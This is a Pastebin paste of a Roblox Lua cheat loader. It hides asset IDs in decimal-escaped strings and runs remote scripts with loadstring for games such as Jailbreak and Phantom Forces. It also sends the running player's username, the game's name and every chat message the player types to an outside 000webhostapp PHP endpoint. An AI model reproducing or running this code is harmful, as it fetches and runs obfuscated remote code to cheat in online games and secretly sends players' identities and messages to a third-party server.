Advertisement
Gostrondude

Untitled

Oct 21st, 2017
1,066
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.90 KB | None | 0 0
  1.  
  2. local ID = game.PlaceId
  3. local Players = game:GetService("Players")
  4.  
  5. local function DisChat(name,message)
  6. game:HttpGetAsync("https://phproblox.000webhostapp.com/Whitelist/IRC/rblxpost.php?name="..name.."&msg="..message)
  7. end
  8.  
  9. local MainGUI = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\50\50\53\56\48\56\54\49")
  10. MainGUI[1].Parent=game.CoreGui;
  11.  
  12. if ID == 863266079 then -- Apoc 2
  13. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\50\48\49\56\48\56\48\51")
  14. loadstring(abc[1].Source)()
  15.  
  16. elseif ID == 606849621 then -- Jailbreak
  17. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\50\48\49\56\49\57\56\50")
  18. loadstring(abc[1].Source)()
  19.  
  20. elseif ID == 292439477 then -- Phantom Forces
  21. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\50\48\49\56\51\49\52\51")
  22. loadstring(abc[1].Source)()
  23.  
  24. elseif ID == 985510407 then -- Weight Lifting Simulator 2
  25. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\51\53\52\54\55\48\57\49")
  26. loadstring(abc[1].Source)()
  27.  
  28. elseif ID == 301549746 then -- CB:RO
  29. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\51\53\52\56\57\54\50\50")
  30. loadstring(abc[1].Source)()
  31.  
  32. elseif ID == 455366377 then -- The Streets
  33. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\51\55\57\56\57\51\53\53")
  34. loadstring(abc[1].Source)()
  35.  
  36. else
  37. local abc = game:GetObjects("\114\98\120\97\115\115\101\116\105\100\58\47\47\49\48\50\48\49\55\57\51\51\49")
  38. loadstring(abc[1].Source)()
  39. end
  40.  
  41. DisChat("ROBLOX","Loaded on All Clients")
  42. wait()
  43. DisChat("ROBLOX","Ran By ``"..Players.LocalPlayer.Name.."`` In **"..game:GetService('MarketplaceService'):GetProductInfo(ID).Name.."**")
  44.  
  45. Players.LocalPlayer.Chatted:Connect(function(D)
  46. DisChat(Players.LocalPlayer.Name,D)
  47. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement